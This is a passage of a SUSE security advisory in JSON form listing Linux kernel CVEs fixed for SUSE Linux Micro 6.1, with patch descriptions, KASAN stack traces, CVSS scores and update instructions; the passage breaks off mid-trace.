"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40301",
"url": "https://www.suse.com/security/cve/CVE-2025-40301"
},
{
"category": "external",
"summary": "SUSE Bug 1255193 for CVE-2025-40301",
"url": "https://bugzilla.suse.com/1255193"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-40301"
},
{
"cve": "CVE-2025-40304",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40304"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nfbdev: Add bounds checking in bit_putcs to fix vmalloc-out-of-bounds\n\nAdd bounds checking to prevent writes past framebuffer boundaries when\nrendering text near screen edges. Return early if the Y position is off-screen\nand clip image height to screen boundary. Break from the rendering loop if the\nX position is off-screen. When clipping image width to fit the screen, update\nthe character count to match the clipped width to prevent buffer size\nmismatches.\n\nWithout the character count update, bit_putcs_aligned and bit_putcs_unaligned\nreceive mismatched parameters where the buffer is allocated for the clipped\nwidth but cnt reflects the original larger count, causing out-of-bounds writes.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40304",
"url": "https://www.suse.com/security/cve/CVE-2025-40304"
},
{
"category": "external",
"summary": "SUSE Bug 1255034 for CVE-2025-40304",
"url": "https://bugzilla.suse.com/1255034"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-40304"
},
{
"cve": "CVE-2025-40306",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40306"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\norangefs: fix xattr related buffer overflow...\n\nWilly Tarreau \u003cw@1wt.eu\u003e forwarded me a message from\nDisclosure \u003cdisclosure@aisle.com\u003e with the following\nwarning:\n\n\u003e The helper `xattr_key()` uses the pointer variable in the loop condition\n\u003e rather than dereferencing it. As `key` is incremented, it remains non-NULL\n\u003e (until it runs into unmapped memory), so the loop does not terminate on\n\u003e valid C strings and will walk memory indefinitely, consuming CPU or hanging\n\u003e the thread.\n\nI easily reproduced this with setfattr and getfattr, causing a kernel\noops, hung user processes and corrupted orangefs files. Disclosure\nsent along a diff (not a patch) with a suggested fix, which I based\nthis patch on.\n\nAfter xattr_key started working right, xfstest generic/069 exposed an\nxattr related memory leak that lead to OOM. xattr_key returns\na hashed key. When adding xattrs to the orangefs xattr cache, orangefs\nused hash_add, a kernel hashing macro. hash_add also hashes the key using\nhash_log which resulted in additions to the xattr cache going to the wrong\nhash bucket. generic/069 tortures a single file and orangefs does a\ngetattr for the xattr \"security.capability\" every time. Orangefs\nnegative caches on xattrs which includes a kmalloc. Since adds to the\nxattr cache were going to the wrong bucket, every getattr for\n\"security.capability\" resulted in another kmalloc, none of which were\never freed.\n\nI changed the two uses of hash_add to hlist_add_head instead\nand the memory leak ceased and generic/069 quit throwing furniture.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40306",
"url": "https://www.suse.com/security/cve/CVE-2025-40306"
},
{
"category": "external",
"summary": "SUSE Bug 1255062 for CVE-2025-40306",
"url": "https://bugzilla.suse.com/1255062"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-40306"
},
{
"cve": "CVE-2025-40307",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40307"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nexfat: validate cluster allocation bits of the allocation bitmap\n\nsyzbot created an exfat image with cluster bits not set for the allocation\nbitmap. exfat-fs reads and uses the allocation bitmap without checking\nthis. The problem is that if the start cluster of the allocation bitmap\nis 6, cluster 6 can be allocated when creating a directory with mkdir.\nexfat zeros out this cluster in exfat_mkdir, which can delete existing\nentries. This can reallocate the allocated entries. In addition,\nthe allocation bitmap is also zeroed out, so cluster 6 can be reallocated.\nThis patch adds exfat_test_bitmap_range to validate that clusters used for\nthe allocation bitmap are correctly marked as in-use.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40307",
"url": "https://www.suse.com/security/cve/CVE-2025-40307"
},
{
"category": "external",
"summary": "SUSE Bug 1255039 for CVE-2025-40307",
"url": "https://bugzilla.suse.com/1255039"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-40307"
},
{
"cve": "CVE-2025-40308",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40308"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nBluetooth: bcsp: receive data only if registered\n\nCurrently, bcsp_recv() can be called even when the BCSP protocol has not\nbeen registered. This leads to a NULL pointer dereference, as shown in\nthe following stack trace:\n\n KASAN: null-ptr-deref in range [0x0000000000000108-0x000000000000010f]\n RIP: 0010:bcsp_recv+0x13d/0x1740 drivers/bluetooth/hci_bcsp.c:590\n Call Trace:\n \u003cTASK\u003e\n hci_uart_tty_receive+0x194/0x220 drivers/bluetooth/hci_ldisc.c:627\n tiocsti+0x23c/0x2c0 drivers/tty/tty_io.c:2290\n tty_ioctl+0x626/0xde0 drivers/tty/tty_io.c:2706\n vfs_ioctl fs/ioctl.c:51 [inline]\n __do_sys_ioctl fs/ioctl.c:907 [inline]\n __se_sys_ioctl+0xfc/0x170 fs/ioctl.c:893\n do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]\n do_syscall_64+0xfa/0x3b0 arch/x86/entry/syscall_64.c:94\n entry_SYSCALL_64_after_hwframe+0x77/0x7f\n\nTo prevent this, ensure that the HCI_UART_REGISTERED flag is set before\nprocessing received data. If the protocol is not registered, return\n-EUNATCH.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40308",
"url": "https://www.suse.com/security/cve/CVE-2025-40308"
},
{
"category": "external",
"summary": "SUSE Bug 1255064 for CVE-2025-40308",
"url": "https://bugzilla.suse.com/1255064"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-40308"
},
{
"cve": "CVE-2025-40309",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40309"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nBluetooth: SCO: Fix UAF on sco_conn_free\n\nBUG: KASAN: slab-use-after-free in sco_conn_free net/bluetooth/sco.c:87 [inline]\nBUG: KASAN: slab-use-after-free in kref_put include/linux/kref.h:65 [inline]\nBUG: KASAN: slab-use-after-free in sco_conn_put+0xdd/0x410\nnet/bluetooth/sco.c:107\nWrite of size 8 at addr ffff88811cb96b50 by task kworker/u17:4/352\n\nCPU: 1 UID: 0 PID: 352 Comm: kworker/u17:4 Not tainted\n6.17.0-rc5-g717368f83676 #4 PREEMPT(voluntary)\nHardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.15.0-1 04/01/2014\nWorkqueue: hci13 hci_cmd_sync_work\nCall Trace:\n \u003cTASK\u003e\n __dump_stack lib/dump_stack.c:94 [inline]\n dump_stack_lvl+0x10b/0x170 lib/dump_stack.c:120\n print_address_description mm/kasan/report.c:378 [inline]\n print_report+0x191/0x550 mm/kasan/report.c:482\n kasan_report+0xc4/0x100 mm/kasan/report.c:595\n sco_conn_free net/bluetooth/sco.c:87 [inline]\n kref_put include/linux/kref.h:65 [inline]\n sco_conn_put+0xdd/0x410 net/bluetooth/sco.c:107\n sco_connect_cfm+0xb4/0xae0 net/bluetooth/sco.c:1441\n hci_connect_cfm include/net/bluetooth/hci_core.h:2082 [inline]\n hci_conn_failed+0x20a/0x2e0 net/bluetooth/hci_conn.c:1313\n hci_conn_unlink+0x55f/0x810 net/bluetooth/hci_conn.c:1121\n hci_conn_del+0xb6/0x1110 